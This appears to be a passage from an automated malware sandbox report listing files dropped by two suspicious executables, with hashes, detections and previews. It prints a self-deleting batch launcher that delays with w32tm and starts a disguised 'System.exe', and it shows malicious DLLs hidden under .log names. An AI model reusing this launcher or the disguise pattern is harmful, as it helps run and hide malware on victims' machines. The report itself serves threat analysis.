SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jdHNP7wu4O

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jdVhlb0iVx

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.053385754768165
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEJ/2cEyKOZG1cNwi23fzNo9:HTg9uYDE0R7ZrW
MD5:	13292D69E95825103C543100538F1979
SHA1:	1D51A791F6162039222DB633CFE2ECD412C7DF66
SHA-256:	41CEC3824849FF94E4B633C98B399A7333F4D36C22BE4BF8ADC0305A75A14D59
SHA-512:	247F0FE51DF0103EB99735CA699832C65D927700975A054AAE9B79FC902F51A386DF8519DB235087F4D1FD03CC18ADAD2FCBAAB3DEF222EDB14F570B1ADFA90C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\ServerfontSessiondhcpcommon\System.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jlgss9VamV.bat"

C:\Users\user\AppData\Local\Temp\kxZJJXaHRj

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lHUOhgEtC1

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ql2J0733XV

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\t3mgGlnJT9

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.973660689688185
Encrypted:	false
SSDEEP:	3:dEXVcE:d4VcE
MD5:	1F9703CA709C445A6F5B075F1D734270
SHA1:	0EF01CBC3DF765AACC1ECCF2E23051AE2426A519
SHA-256:	D180EF9E8FADF2833E445293175CEF2C71BC8C95B48611F6BBD3E40F5F287C9F
SHA-512:	07DE55A6CC06FE43D80100418F0C6E589A92B3BC8603A20EEF1836A6C931375BB62D646DC15540A39AC1EAB9BD1FFB2D660BD2CBFDA1ACA81044A98D3B851E80
Malicious:	false
Preview:	AIqOXqz4hSVLhOIaB2aYABvaH

C:\Users\user\AppData\Local\Temp\v5rE4VfTP6

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:+DoH67yxK:rHhc
MD5:	628A29252AA147D3076C5F00D45D7A2E
SHA1:	5536C5F62EACA4F82D0949FE78156DE61D95F219
SHA-256:	6A7BFEDB93FAEE19CEBB1937D983D016BE0849C41EA9164D04D394F181C29704
SHA-512:	97867CABA4E8E71A05E7EA11833B19E8C0E512369FDE3AF46BB4951EFFF9E91BCDCC7D707801821C11729CB34066CD4BC129B2BB89B75E2772B7606587090937
Malicious:	false
Preview:	kedeXuu1TbVsUkJQ6ACPfpoPZ

C:\Users\user\AppData\Local\Temp\y8eRAgYVdf

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zu5RAkSQwT

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\DRWwxNDB.log

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\GKmeiJoz.log

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GQkmowWr.log

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MnYteEKs.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OyuueWqt.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VWrJOgQa.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aQQAtfnE.log

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\eIjRcJGM.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fFKZyJVH.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\nzxGUrLb.log

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wcGwEkbJ.log

Download File

Process:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xRmeReqW.log

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.810370581684919
Encrypted:	false
